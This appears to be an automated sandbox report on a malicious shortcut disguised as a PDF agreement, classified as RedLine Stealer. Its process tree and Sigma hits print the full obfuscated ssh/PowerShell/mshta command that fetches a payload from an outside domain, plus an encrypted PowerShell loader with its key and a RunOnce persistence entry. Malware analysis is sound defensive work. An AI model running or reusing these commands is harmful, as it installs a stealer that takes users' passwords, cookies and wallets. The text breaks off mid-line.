Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Agreement for Cooperation.PDF.lnk.download.lnk

Overview

General Information

Sample name:Agreement for Cooperation.PDF.lnk.download.lnk
Analysis ID:1573535
MD5:afcfa278d35726531039ed7311ffb41c
SHA1:b22377c6e7ac143abe5d83e8cc339742a12f3bf2
SHA256:224f45017a9dbb7db7fe2836771d8f4e77c9735499c20a19c832a91b156d7056
Tags:185-147-124-236lnkuser-JAMESWT_MHT
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RedLine Stealer
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses known network protocols on non-standard ports
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Lolbin Ssh.exe Use As Proxy
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • ssh.exe (PID: 5896 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
    • conhost.exe (PID: 528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4436 cmdline: powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 5560 cmdline: "C:\Windows\system32\mshta.exe" https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 6524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function xmCKI($tXxJW){return -split ($tXxJW -replace '..', '0x$& ')};$LWTKB = xmCKI('A91AEEF14D627B7FAFF488DBCCFE43EDD74C8EC41DF4AFDAE86A2CACD63D2618E776AB95B16BE51714D0C93388447C10995B802510DA96A4BF1B9A934093F8EA670FE6B480A54AB53BE4B52FC1ABDD0B2F9A47D5FD8EC0B5565CF6E0D5AAA18330404F1BAB02271E1F4ADB91DA26835FBD6F294448368AE11C958F79F412C62C2B5B5ED8BC591CE31107DB0B96407294783A633B181B6CCFC9827E4078D2D612AECF34E25C3732DA701D97A8D605EA1A7C739ADF164E68BD11E6ACEC79C72BEDBA160C18420A5DB1D9810BD0B1FE135F640F78FEC268A192784340B9C69305F19E92CF4F0EF596571F8839C8ACF651D0BA0EE2D7EC50E13BE537E55036BC27049B63D09CA27C81001319E386CF456F2175699371CAD7A1A9F6165C7C5452BCA976318223F68E182DDFA4A6A6E0D3A37B3FF3D396A65B4465C3CC0736702E834F0BAAAE20F6B4E273E97BD27BF14DAB30E834EC586FA7FEB119497E06F166F11571BD5761F27FC24FD517F4F7B7D12D7114EFC8DB1E29AA9687AC4BC2A6B4BDD893E35941DAC5F77F86582F2F16A448F88F4807CB645FDC4426FF6A2A211758433846D104900F052F81898303FB3E54B3F463B628B3140A4BBD84F9E5B31E891ED77433A9B65BD1C0FEA1C06740E0BC212BC132161654E200851A5DA2BB192042E792908EA1F9C6EB7EEE004E8E047C0A08E66E6D9B8E7BCB944609F5B020CC1479272B40A2D304AC191E6C492064720ABE984D0F4CF077C873C863D03924997C8E4E627C7811BF2EBD9B06DA61C1C0B04E7EA2F2CABB41143DA53E8F7300F859AE1CFDF9875E0DFEEBD0FF7229B35B1646F5B57816308AD9D62C6CA75D45BD15C1A2B4DA51922CAA8E46AC5B09DF7821207379A305101F22EA2F6BB40DBA589322A506D5AD46DA486CF86F662522D165F38590072F1ACCF13A612369B433B00E300CFD06068817A53C68187347C9AD251D6F1F333877BAD8577C4AB84BA78F81483CBCB6BDB1E8FE6A5233FDFFF6CC9928404B2E11CFC58E38822138C47F68D6A48778E95F28D8F25C5F1A20D5A198B64B2F05536C7EA824FF816BF184FEA692844BADF041A46DC4E6A197BDA3855B32C46F4B393D58D5D4C7BFBCF82BEB6990BB2069DA637871DBFB368F1C0E6C0F2A72676CCF3B7FA358C5E09F7E9A8F481775A2D9117CF07D2ED2895D11A6B79E3CE80BD9091E7CC6FCFC76786B1A9A48950C7262C0E9607A4C88C23F16B1CD72267A4445314586554ED8498E02E1556E66E550678D68D2A7DBDBC94565DFEE58566DCE466D06C87ACD0517E92543D88380A92238E86864E5F75C12798C8828272B20A02C40B6B317F309F4D0C660C1D640DEF366D59F6E605CA9CEA69B14214C5D03DF39FC5D74B79C43D775D114603D2C9BE7F3D35D5F2C62881528C7674E5F58B568C6356FC1470BD70B46364F0545EFF33FFC0F3A9487F46E68A23603BCF5A004A1E550EB57C6E96B9828CB4973DBFCB8D62AFD7390E01D13CC7760093F91B2F0C22D85E18D540E5CBFF1D1A2466BDD39B1846617923D9C4B65A96DF2E6FCA65713714D212F0F1E8A005B0154FBD7266BA5500E44B40DDFC0174EC740D8CE82EC79B28E9071C42D33693277F784C16744C61BAB31BEF511D797C50AFCE5B6F0157F4B0B8F8201DBCAFA5813F3156ECFB13519109FF3673AEFC6E65C7966D8AFA03A8D9D665BF954962CC128461D04E92BBC3E9ACD8CA2B7120BF07F55A8EE5E4B6F185E1266C8EDDD2EE3761605723CF877A93883B9F459F8231AF5FF827049DD16CBCFA02DE3ABB97DA37D487474F6D66EFAF3D7D75CF686BD09C2D72BBEA469800332FE98AA37BAAC82515B23041CB7D36849F05AC76ED6CF4E5DEEAB16E7FFA53E4B56F7ECC66091D6B1DFAF76D3C264E80E69B82674685BF8A742080384CA722B401E88F71676753C5F86D718994E638562E8B5A9B07D82E69F8043E40065E720A1B159FDD6D422B58B784FC0DC1FBD4AA773C81457678A232A511A9D003C4DB9E025EF9F458C995E02A85E47A1C1D08ABA6C6B961E1EAC27D4CA93357F222D315807604E1295E626467CA86739D1FB7D74E330D45B35F3FAFDD866ED5DA7163AA4769CA8211369E714E434BEEE33B686127CF828CE28B733D87D9F7EB917D362A6E7119EA05B27F6B7E73281AB2282F3B7DB5BEB87E51F8CE4C3C0E5FDCF0A61EDFFDC42860D4F83CFCE4AF856390F0FE361B1A850DE1143E75D4F49BAE8ABB1E1722A2785BEE26D4FF5435842F86C401E050C61E995F3CCD79DBFAC63');$RoyR=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((xmCKI('71477A505565504A52655A7563627948')),[byte[]]::new(16)).TransformFinalBlock($LWTKB,0,$LWTKB.Length)); & $RoyR.Substring(0,3) $RoyR.Substring(334) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • updater.exe (PID: 3780 cmdline: "C:\Users\user\AppData\Local\Temp\47891652\updater.exe" C:\Users\user\AppData\Local\Temp\47891652\bovZdOEN.bin MD5: C56B5F0201A3B3DE53E561FE76912BFD)
              • InstallUtil.exe (PID: 3408 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
              • InstallUtil.exe (PID: 3372 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • svchost.exe (PID: 1532 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • AutoIt3.exe (PID: 7128 cmdline: "C:\ahdccea\AutoIt3.exe" C:\ahdccea\bdbhbhc.a3x MD5: C56B5F0201A3B3DE53E561FE76912BFD)
    • InstallUtil.exe (PID: 1684 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • AutoIt3.exe (PID: 3580 cmdline: "C:\ahdccea\AutoIt3.exe" C:\ahdccea\bdbhbhc.a3x MD5: C56B5F0201A3B3DE53E561FE76912BFD)
    • InstallUtil.exe (PID: 5448 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
No configs have been found
SourceRuleDescriptionAuthorStrings
00000010.00000003.2428270359.00000000046E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000010.00000003.2428270359.00000000046E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      0000000E.00000002.2357090356.0000000004410000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000E.00000002.2357090356.0000000004410000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000000F.00000002.2354019803.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 27 entries
            SourceRuleDescriptionAuthorStrings
            14.2.AutoIt3.exe.442c974.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              14.2.AutoIt3.exe.442c974.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                14.2.AutoIt3.exe.442c974.1.unpackMALWARE_Win_Arechclient2Detects Arechclient2 RATditekSHen
                • 0xb684a:$s14: keybd_event
                • 0xbd5b9:$v1_1: grabber@
                • 0xb741c:$v1_2: <BrowserProfile>k__
                • 0xb7e95:$v1_3: <SystemHardwares>k__
                • 0xb7f54:$v1_5: <ScannedWallets>k__
                • 0xb7fe4:$v1_6: <DicrFiles>k__
                • 0xb7fc0:$v1_7: <MessageClientFiles>k__
                • 0xb838a:$v1_8: <ScanBrowsers>k__BackingField
                • 0xb83dc:$v1_8: <ScanWallets>k__BackingField
                • 0xb83f9:$v1_8: <ScanScreen>k__BackingField
                • 0xb8433:$v1_8: <ScanVPN>k__BackingField
                • 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost
                • 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
                11.2.updater.exe.417c974.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  11.2.updater.exe.417c974.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 16 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5516, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4, ProcessId: 5560, ProcessName: mshta.exe
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function xmCKI($tXxJW){return -split ($tXxJW -replace '..', '0x$& ')};$LWTKB = xmCKI('A91AEEF14D627B7FAFF488DBCCFE43EDD74C8EC41DF4AFDAE86A2CACD63D2618E776AB95B16BE51714D0C93388447C10995B802510DA96A4BF1B9A934093F8EA670FE6B480A54AB53BE4B52FC1ABDD0B2F9A47D5FD8EC0B5565CF6E0D5AAA18330404F1BAB02271E1F4ADB91DA26835FBD6F294448368AE11C958F79F412C62C2B5B5ED8BC591CE31107DB0B96407294783A633B181B6CCFC9827E4078D2D612AECF34E25C3732DA701D97A8D605EA1A7C739ADF164E68BD11E6ACEC79C72BEDBA160C18420A5DB1D9810BD0B1FE135F640F78FEC268A192784340B9C69305F19E92CF4F0EF596571F8839C8ACF651D0BA0EE2D7EC50E13BE537E55036BC27049B63D09CA27C81001319E386CF456F2175699371CAD7A1A9F6165C7C5452BCA976318223F68E182DDFA4A6A6E0D3A37B3FF3D396A65B4465C3CC0736702E834F0BAAAE20F6B4E273E97BD27BF14DAB30E834EC586FA7FEB119497E06F166F11571BD5761F27FC24FD517F4F7B7D12D7114EFC8DB1E29AA9687AC4BC2A6B4BDD893E35941DAC5F77F86582F2F16A448F88F4807CB645FDC4426FF6A2A211758433846D104900F052F81898303FB3E54B3F463B628B3140A4BBD84F9E5B31E891ED77433A9B65BD1C0FEA1C06740E0BC212BC132161654E200851A5DA2BB192042E792908EA1F9C6EB7EEE004E8E047C0A08E66E6D9B8E7BCB944609F5B020CC1479272B40A2D304AC191E6C492064720ABE984D0F4CF077C873C863D03924997C8E4E627C7811BF2EBD9B06DA61C1C0B04E7EA2F2CABB41143DA53E8F7300F859AE1CFDF9875E0DFEEBD0FF7229B35B1646F5B57816308AD9D62C6CA75D45BD15C1A2B4DA51922CAA8E46AC5B09DF7821207379A305101F22EA2F6BB40DBA589322A506D5AD46DA486CF86F662522D165F38590072F1ACCF13A612369B433B00E300CFD06068817A53C68187347C9AD251D6F1F333877BAD8577C4AB84BA78F81483CBCB6BDB1E8FE6A5233FDFFF6CC9928404B2E11CFC58E38822138C47F68D6A48778E95F28D8F25C5F1A20D5A198B64B2F05536C7EA824FF816BF184FEA692844BADF041A46DC4E6A197BDA3855B32C46F4B393D58D5D4C7BFBCF82BEB6990BB2069DA637871DBFB368F1C0E6C0F2A72676CCF3B7FA358C5E09F7E9A8F481775A2D9117CF07D2ED2895D11A6B79E3CE80BD9091E7CC6FCFC76786B1A9A48950C7262C0E9607A4C88C23F16B1CD72267A4445314586554ED8498E02E1556E66E550678D68D2A7DBDBC94565DFEE58566DCE466D06C87ACD0517E92543D88380A92238E86864E5F75C12798C8828272B20A02C40B6B317F309F4D0C660C1D640DEF366D59F6E605CA9CEA69B14214C5D03DF39FC5D74B79C43D775D114603D2C9BE7F3D35D5F2C62881528C7674E5F58B568C6356FC1470BD70B46364F0545EFF33FFC0F3A9487F46E68A23603BCF5A004A1E550EB57C6E96B9828CB4973DBFCB8D62AFD7390E01D13CC7760093F91B2F0C22D85E18D540E5CBFF1D1A2466BDD39B1846617923D9C4B65A96DF2E6FCA65713714D212F0F1E8A005B0154FBD7266BA5500E44B40DDFC0174EC740D8CE82EC79B28E9071C42D33693277F784C16744C61BAB31BEF511D797C50AFCE5B6F0157F4B0B8F8201DBCAFA5813F3156ECFB13519109FF3673AEFC6E65C7966D8AFA03A8D9D665BF954962CC128461D04E92BBC3E9ACD8CA2B7120BF07F55A8EE5E4B6F185E1266C8EDDD2EE3761605723CF877A93883B9F459F8231AF5FF827049DD16CBCFA02DE3ABB97DA37D487474F6D66EFAF3D7D75CF686BD09C2D72BBEA469800332FE98AA37BAAC82515B23041CB7D36849F05AC76ED6CF4E5DEEAB16E7FFA53E4B56F7ECC66091D6B1DFAF76D3C264E80E69B82674685BF8A742080384CA722B401E88F71676753C5F86D718994E638562E8B5A9B07D82E69F8043E40065E720A1B159FDD6D422B58B784F
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function xmCKI($tXxJW){return -split ($tXxJW -replace '..', '0x$& ')};$LWTKB = xmCKI('A91AEEF14D627B7FAFF488DBCCFE43EDD74C8EC41DF4AFDAE86A2CACD63D2618E776AB95B16BE51714D0C93388447C10995B802510DA96A4BF1B9A934093F8EA670FE6B480A54AB53BE4B52FC1ABDD0B2F9A47D5FD8EC0B5565CF6E0D5AAA18330404F1BAB02271E1F4ADB91DA26835FBD6F294448368AE11C958F79F412C62C2B5B5ED8BC591CE31107DB0B96407294783A633B181B6CCFC9827E4078D2D612AECF34E25C3732DA701D97A8D605EA1A7C739ADF164E68BD11E6ACEC79C72BEDBA160C18420A5DB1D9810BD0B1FE135F640F78FEC268A192784340B9C69305F19E92CF4F0EF596571F8839C8ACF651D0BA0EE2D7EC50E13BE537E55036BC27049B63D09CA27C81001319E386CF456F2175699371CAD7A1A9F6165C7C5452BCA976318223F68E182DDFA4A6A6E0D3A37B3FF3D396A65B4465C3CC0736702E834F0BAAAE20F6B4E273E97BD27BF14DAB30E834EC586FA7FEB119497E06F166F11571BD5761F27FC24FD517F4F7B7D12D7114EFC8DB1E29AA9687AC4BC2A6B4BDD893E35941DAC5F77F86582F2F16A448F88F4807CB645FDC4426FF6A2A211758433846D104900F052F81898303FB3E54B3F463B628B3140A4BBD84F9E5B31E891ED77433A9B65BD1C0FEA1C06740E0BC212BC132161654E200851A5DA2BB192042E792908EA1F9C6EB7EEE004E8E047C0A08E66E6D9B8E7BCB944609F5B020CC1479272B40A2D304AC191E6C492064720ABE984D0F4CF077C873C863D03924997C8E4E627C7811BF2EBD9B06DA61C1C0B04E7EA2F2CABB41143DA53E8F7300F859AE1CFDF9875E0DFEEBD0FF7229B35B1646F5B57816308AD9D62C6CA75D45BD15C1A2B4DA51922CAA8E46AC5B09DF7821207379A305101F22EA2F6BB40DBA589322A506D5AD46DA486CF86F662522D165F38590072F1ACCF13A612369B433B00E300CFD06068817A53C68187347C9AD251D6F1F333877BAD8577C4AB84BA78F81483CBCB6BDB1E8FE6A5233FDFFF6CC9928404B2E11CFC58E38822138C47F68D6A48778E95F28D8F25C5F1A20D5A198B64B2F05536C7EA824FF816BF184FEA692844BADF041A46DC4E6A197BDA3855B32C46F4B393D58D5D4C7BFBCF82BEB6990BB2069DA637871DBFB368F1C0E6C0F2A72676CCF3B7FA358C5E09F7E9A8F481775A2D9117CF07D2ED2895D11A6B79E3CE80BD9091E7CC6FCFC76786B1A9A48950C7262C0E9607A4C88C23F16B1CD72267A4445314586554ED8498E02E1556E66E550678D68D2A7DBDBC94565DFEE58566DCE466D06C87ACD0517E92543D88380A92238E86864E5F75C12798C8828272B20A02C40B6B317F309F4D0C660C1D640DEF366D59F6E605CA9CEA69B14214C5D03DF39FC5D74B79C43D775D114603D2C9BE7F3D35D5F2C62881528C7674E5F58B568C6356FC1470BD70B46364F0545EFF33FFC0F3A9487F46E68A23603BCF5A004A1E550EB57C6E96B9828CB4973DBFCB8D62AFD7390E01D13CC7760093F91B2F0C22D85E18D540E5CBFF1D1A2466BDD39B1846617923D9C4B65A96DF2E6FCA65713714D212F0F1E8A005B0154FBD7266BA5500E44B40DDFC0174EC740D8CE82EC79B28E9071C42D33693277F784C16744C61BAB31BEF511D797C50AFCE5B6F0157F4B0B8F8201DBCAFA5813F3156ECFB13519109FF3673AEFC6E65C7966D8AFA03A8D9D665BF954962CC128461D04E92BBC3E9ACD8CA2B7120BF07F55A8EE5E4B6F185E1266C8EDDD2EE3761605723CF877A93883B9F459F8231AF5FF827049DD16CBCFA02DE3ABB97DA37D487474F6D66EFAF3D7D75CF686BD09C2D72BBEA469800332FE98AA37BAAC82515B23041CB7D36849F05AC76ED6CF4E5DEEAB16E7FFA53E4B56F7ECC66091D6B1DFAF76D3C264E80E69B82674685BF8A742080384CA722B401E88F71676753C5F86D718994E638562E8B5A9B07D82E69F8043E40065E720A1B159FDD6D422B58B784F
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ahdccea\AutoIt3.exe" C:\ahdccea\bdbhbhc.a3x, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\47891652\updater.exe, ProcessId: 3780, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\bdbhbhc
                    Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')" ., ProcessId: 5896, ProcessName: ssh.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']'), CommandLine: powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e 